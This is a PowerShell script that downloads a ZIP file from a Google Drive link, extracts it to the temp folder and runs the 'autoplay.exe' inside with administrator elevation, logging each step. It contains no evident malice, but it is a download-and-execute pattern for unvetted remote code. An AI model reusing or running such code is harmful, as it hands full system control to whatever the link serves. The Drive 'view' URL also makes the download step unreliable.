# Define the URL of the Google Drive file
$googleDriveFileUrl = "https://drive.google.com/file/d/1sUzJKWATRyASNCiSqlSkVVq4_jrkEYwE/view?usp=drive_link"

# Define the local paths
$localZipPath = Join-Path $env:TEMP "downloadedFolder.zip"
$extractedFolderPath = Join-Path $env:TEMP "extractedFolder"

# Function to log messages
function Log-Message {
    param (
        [string]$message
    )
    $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
    Write-Output "$timestamp - $message"
}

# Function to download the file
function Download-File {
    param (
        [string]$url,
        [string]$outputPath
    )

    try {
        Log-Message "Starting download from $url..."
        Invoke-WebRequest -Uri $url -OutFile $outputPath -ErrorAction Stop
        Log-Message "File downloaded successfully to $outputPath."
    } catch {
        Log-Message "Error downloading file: $_"
        throw $_
    }
}

# Function to extract the ZIP file
function Extract-ZipFile {
    param (
        [string]$zipPath,
        [string]$destinationPath
    )

    try {
        Log-Message "Starting extraction of $zipPath..."
        Expand-Archive -Path $zipPath -DestinationPath $destinationPath -Force -ErrorAction Stop
        Log-Message "Extraction completed successfully to $destinationPath."
    } catch {
        Log-Message "Error extracting file: $_"
        throw $_
    }
}

# Function to execute the EXE file
function Execute-File {
    param (
        [string]$filePath
    )

    try {
        Log-Message "Starting execution of $filePath..."
        Start-Process -FilePath $filePath -Verb RunAs -Wait -NoNewWindow -ErrorAction Stop
        Log-Message "Execution completed successfully."
    } catch {
        Log-Message "Error during execution: $_"
        throw $_
    }
}

# Main script execution
try {
    # Download the ZIP file
    Download-File -url $googleDriveFileUrl -outputPath $localZipPath

    # Extract the ZIP file
    Extract-ZipFile -zipPath $localZipPath -destinationPath $extractedFolderPath

    # Open the extracted folder
    Log-Message "Opening extracted folder..."
    Start-Process -FilePath explorer.exe -ArgumentList $extractedFolderPath -Verb RunAs

    # Define the path to the EXE file within the extracted folder
    $exeFilePath = Join-Path $extractedFolderPath "autoplay.exe"

    # Check if the EXE file exists and execute it
    if (Test-Path $exeFilePath) {
        Execute-File -filePath $exeFilePath
    } else {
        Log-Message "EXE file not found in the extracted folder."
        throw "EXE file not found."
    }
} catch {
    Log-Message "Script failed: $_"
    exit 1
} finally {
    # Clean up downloaded ZIP file
    if (Test-Path $localZipPath) {
        Remove-Item $localZipPath -ErrorAction SilentlyContinue
        Log-Message "Cleaned up downloaded ZIP file."
    }
    # Pause to keep the PowerShell window open
    Read-Host -Prompt "Press Enter to exit"
}
